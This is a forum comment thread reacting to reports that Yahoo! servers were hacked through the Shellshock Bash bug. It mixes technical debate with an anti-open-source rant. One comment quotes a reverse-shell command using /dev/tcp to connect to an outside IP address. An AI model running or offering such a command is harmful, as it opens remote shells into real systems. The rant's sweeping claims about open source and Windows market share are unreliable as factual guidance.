living under a rock
"As soon as we became aware of the issue, we began patching our systems and have been closely monitoring our network," a Yahoo! spokesperson told The Register in an emailed statement.
its even been on the bbc ffs.
Yahoo! said "a handful" of its servers fell to hackers who may have been trying to exploit the Shellshock vulnerability in Bash. The miscreants took control of the web servers to build a botnet out of them, it is claimed. "As soon as we became aware of the issue, we began patching our systems and have been closely monitoring …
Why in the world Bash isn't deleted from any Internet-facing system, I have no idea. If you look at John Hall's code, it's Bash itself that's making a connection back to Hall's servers. I can imagine that a complete evil server system could be hidden in Bash environmental variables. A "minimal system" should be exactly that, with minimal functionality.
Amazingly, a tool is being used as a tool.
Even in a "minimal system" the tools to do maintenance must still be available from time to time. Unless we are talking embedded.
Whether "Bash is Bollocks for security" is neither here nor there.
The error here consists in making the swiss army knife usable from outside. That is a combination of using shell scripts to process the "Agent" header and having that bash bug. The error does not consist in having the swiss army knife available in the first place.
"/bin/bash –i >&/dev/tcp/199.175.52.92/2221 0>&1" does not do a whole lot. Would it work with any other shell on a system which has nice features underneath /dev/tcp? I sure hope so.
Why use shell scripts to process that "Agent" header? Well, now, that is the REAL question. They should have been gotten rid of some time ago.
"Bash is Bollocks"? It's not just Bash, the entire F/OSS eco-system is riddled with failure. Need I mention Heartbleed? They tout the "many eyes" myth, but as no one actually looks the bugs go unfound.
F/OSS is based on the communist hippy idea that life is all love and cuddles. It isn't. Life is hard and there are assholes at every turn. If you are deploying new servers and you want something that will actually work, for the sake of your security do not deploy F/OSS.
There is a very good reason Windows is the dominant OS in the server room (circa 75%), dominant on the desktop (circa 90%) and taking ground for all comers on mobile.